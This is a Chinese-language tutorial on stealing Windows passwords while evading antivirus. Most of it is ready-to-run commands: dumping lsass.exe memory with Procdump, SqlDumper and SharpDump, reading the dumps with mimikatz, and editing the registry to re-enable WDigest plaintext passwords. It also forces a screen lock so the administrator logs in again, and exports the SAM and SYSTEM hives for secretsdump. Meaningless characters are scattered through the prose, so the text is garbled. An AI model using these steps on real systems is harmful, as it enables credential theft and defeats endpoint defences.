目前大部分抓Windows密碼的工具都會被殺軟攔截饥脑,例如mimikatz,wce懦冰,pwdump等灶轰,下面介紹幾種具有一定免殺效果的抓密碼方式。
一刷钢、Procdump
Procdump是Windows工具包里的一款工具笋颤,由于有微軟的官方簽名,所以大部分殺軟不會查殺内地。
sysinternals工具包下載地址:
https://docs.microsoft.com/zh-cn/sysinternals/downloads/
- 獲取內(nèi)存文件lsass.exe
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
- 將lsass.dmp下載到攻擊者的電腦上
- 使用本地的mimikatz.exe讀取lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
image.png
二椰弊、SqlDumper
如果目標(biāo)安裝了mssql,可以通過sqldumper.exe來dump lsass進(jìn)程瓤鼻,沒安裝也可以手動上傳秉版。
sqldumper的默認(rèn)路徑:C:\Program Files\Microsoft SQL Server\110\Shared
- 先找到lsass.exe的進(jìn)程id
tasklist|findstr "lsass.exe"
- 導(dǎo)出dmp文件
sqldumper.exe <pid> 0 0x01100
- 將導(dǎo)出的SQLDmpr0001.mdmp下載到攻擊者的電腦上
- 使用本地的mimikatz.exe進(jìn)行讀取
mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" "exit"
image.png
三、SharpDump
體積小巧(不到10KB)茬祷,便于自己做免殺處理清焕,下載地址:
https://github.com/GhostPack/SharpDump
- 首先需要使用vs編譯成exe文件
image.png
- 把lsass.exe進(jìn)程數(shù)據(jù)導(dǎo)出來
C:\Users\Administrator\Desktop>SharpDump.exe
image.png
- dump的文件是 bin 后綴,拖到本地機(jī)器上以后祭犯,先重命名為 zip 后綴秸妥,然后解壓
- 使用本地的mimikatz進(jìn)行讀取
mimikatz.exe "sekurlsa::minidump debug516" "sekurlsa::logonPasswords full" "exit"
image.png
四、Win10及2012以后的系統(tǒng)沃粗,如何抓取明文粥惧?
當(dāng)系統(tǒng)為win10或2012以上時,默認(rèn)在Wdigest內(nèi)存中禁止保存明文密碼(hash可以抓到)最盅,可以通過修改注冊表的方式進(jìn)行繞過突雪。
- 修改注冊表
打開:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
關(guān)閉:
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
- 開啟 Wdigest Auth 后起惕,需要重新登錄才能抓到明文,可以使用強(qiáng)制鎖屏的方式咏删,讓管理員重新登錄惹想。
rundll32 user32.dll,LockWorkStation
- 登錄后,再使用Procdump獲取內(nèi)存lsass.exe中的信息督函,就可以得到明文了嘀粱。
說明:如果殺毒軟件有dump內(nèi)存文件保護(hù),則以上方式無法免殺辰狡。
補(bǔ)充:免殺抓hash
使用注冊表導(dǎo)出Hash锋叨,再通過impacket進(jìn)行離線讀取,實戰(zhàn)中大部分殺軟都不會攔截宛篇。
reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
python secretsdump.py -sam sam.hiv -security security.hiv -system sys.hiv LOCAL
image.png
